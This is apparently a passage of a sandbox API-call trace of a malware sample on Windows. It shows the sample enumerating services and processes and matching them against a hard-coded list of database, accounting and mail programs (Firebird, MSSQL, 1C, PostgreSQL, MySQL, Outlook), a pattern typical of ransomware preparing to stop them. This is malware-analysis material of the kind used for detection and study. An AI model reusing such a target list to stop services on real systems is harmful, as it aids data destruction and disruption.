	[0140.302] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0140.302] lstrlenW (lpString="reader_sl.exe") returned 13
	[0140.302] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0
	[0140.302] CloseHandle (hObject=0x3c0) returned 1
	[0140.303] Sleep (dwMilliseconds=0x1f4) 
	[0140.901] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb617048
	[0140.951] EnumServicesStatusExW (in: hSCManager=0xb617048, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0140.951] GetLastError () returned 0xea
	[0140.951] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc9a) returned 0xb612378
	[0140.951] EnumServicesStatusExW (in: hSCManager=0xb617048, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb612378, cbBufSize=0xc9a, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb612378, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0140.952] CloseServiceHandle (hSCObject=0xb617048) returned 1
	[0140.952] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0140.952] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0140.952] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0140.952] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0140.952] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0140.952] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0140.952] lstrlenW (lpString="AudioSrv") returned 8
	[0140.952] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0140.952] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0140.952] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0140.952] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0140.952] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0140.952] lstrlenW (lpString="BFE") returned 3
	[0140.952] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0140.952] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0140.952] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0140.952] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0140.952] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0140.952] lstrlenW (lpString="CryptSvc") returned 8
	[0140.952] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0140.952] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0140.952] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0140.953] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0140.953] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0140.953] lstrlenW (lpString="CscService") returned 10
	[0140.953] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0140.953] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0140.953] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0140.953] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0140.953] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0140.953] lstrlenW (lpString="DcomLaunch") returned 10
	[0140.953] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0140.953] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0140.953] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0140.953] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0140.953] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0140.953] lstrlenW (lpString="Dhcp") returned 4
	[0140.953] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0140.953] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0140.953] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0140.953] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0140.953] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0140.953] lstrlenW (lpString="Dnscache") returned 8
	[0140.953] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0140.953] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0140.953] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0140.953] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0140.953] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0140.953] lstrlenW (lpString="DPS") returned 3
	[0140.954] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0140.954] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0140.954] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0140.954] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0140.954] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0140.954] lstrlenW (lpString="eventlog") returned 8
	[0140.954] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0140.954] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0140.954] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0140.954] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0140.954] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0140.954] lstrlenW (lpString="EventSystem") returned 11
	[0140.954] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0140.954] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0140.954] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0140.954] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0140.954] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0140.954] lstrlenW (lpString="gpsvc") returned 5
	[0140.954] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0140.954] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0140.954] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0140.954] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0140.954] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0140.954] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0140.954] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0140.954] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0140.954] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0140.954] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0140.954] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0140.954] lstrlenW (lpString="lmhosts") returned 7
	[0140.954] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0140.954] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0140.954] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0140.955] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0140.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0140.955] lstrlenW (lpString="MMCSS") returned 5
	[0140.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0140.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0140.955] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0140.955] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0140.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0140.955] lstrlenW (lpString="MpsSvc") returned 6
	[0140.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0140.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0140.955] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0140.955] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0140.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0140.955] lstrlenW (lpString="NlaSvc") returned 6
	[0140.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0140.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0140.955] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0140.955] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0140.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0140.955] lstrlenW (lpString="nsi") returned 3
	[0140.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0140.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0140.955] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0140.955] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0140.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0140.955] lstrlenW (lpString="PcaSvc") returned 6
	[0140.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0140.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0140.955] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0140.955] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0140.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0140.955] lstrlenW (lpString="PlugPlay") returned 8
	[0140.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0140.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0140.956] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0140.956] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0140.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0140.956] lstrlenW (lpString="Power") returned 5
	[0140.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0140.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0140.956] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0140.956] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0140.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0140.956] lstrlenW (lpString="ProfSvc") returned 7
	[0140.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0140.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0140.956] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0140.956] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0140.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0140.956] lstrlenW (lpString="RpcEptMapper") returned 12
	[0140.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0140.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0140.956] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0140.956] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0140.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0140.956] lstrlenW (lpString="RpcSs") returned 5
	[0140.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0140.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0140.956] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0140.956] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0140.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0140.956] lstrlenW (lpString="SamSs") returned 5
	[0140.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0140.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0140.956] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0140.956] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0140.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0140.956] lstrlenW (lpString="Schedule") returned 8
	[0140.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0140.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0140.957] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0140.957] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0140.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0140.957] lstrlenW (lpString="SENS") returned 4
	[0140.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0140.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0140.957] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0140.957] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0140.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0140.957] lstrlenW (lpString="ShellHWDetection") returned 16
	[0140.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0140.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0140.957] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0140.957] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0140.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0140.957] lstrlenW (lpString="Spooler") returned 7
	[0140.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0140.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0140.957] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0140.957] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0140.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0140.957] lstrlenW (lpString="Themes") returned 6
	[0140.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0140.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0140.957] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0140.957] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0140.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0140.957] lstrlenW (lpString="UxSms") returned 5
	[0140.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0140.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0140.957] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0140.958] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0140.958] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0140.958] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb612378 | out: hHeap=0x7ab0000) returned 1
	[0140.958] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3a4
	[0140.959] Process32FirstW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0140.960] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0140.960] lstrlenW (lpString="System") returned 6
	[0140.960] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0140.960] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0140.960] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0140.960] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0140.960] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0140.960] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0140.960] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0140.960] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0140.960] lstrlenW (lpString="smss.exe") returned 8
	[0140.960] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0140.961] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0140.961] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0140.961] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0140.961] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0140.961] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0140.961] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0140.961] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0140.961] lstrlenW (lpString="csrss.exe") returned 9
	[0140.961] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0140.961] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0140.961] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0140.961] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0140.961] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0140.961] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0140.961] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0140.961] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0140.961] lstrlenW (lpString="wininit.exe") returned 11
	[0140.962] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0140.962] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0140.962] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0140.962] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0140.962] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0140.962] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0140.962] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0140.962] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0140.962] lstrlenW (lpString="csrss.exe") returned 9
	[0140.962] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0140.962] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0140.962] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0140.962] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0140.962] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0140.962] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0140.962] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0140.962] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0140.962] lstrlenW (lpString="winlogon.exe") returned 12
	[0140.963] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0140.963] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0140.963] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0140.963] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0140.963] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0140.963] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0140.963] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0140.963] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0140.963] lstrlenW (lpString="services.exe") returned 12
	[0140.963] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0140.963] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0140.963] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1
	[0140.963] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1
	[0140.963] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1
	[0140.963] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1
	[0140.963] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1
	[0140.963] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0140.964] lstrlenW (lpString="lsass.exe") returned 9
	[0140.964] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1
	[0140.964] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1
	[0140.964] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1
	[0140.964] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1
	[0140.964] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1
	[0140.964] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1
	[0140.964] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1
	[0140.964] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0140.964] lstrlenW (lpString="lsm.exe") returned 7
	[0140.964] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1
	[0140.964] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1
	[0140.964] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1
	[0140.964] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1
	[0140.964] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1
	[0140.964] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1
	[0140.964] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1
	[0140.964] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0140.965] lstrlenW (lpString="svchost.exe") returned 11
	[0140.965] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0140.965] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0140.965] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0140.965] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0140.965] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0140.965] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
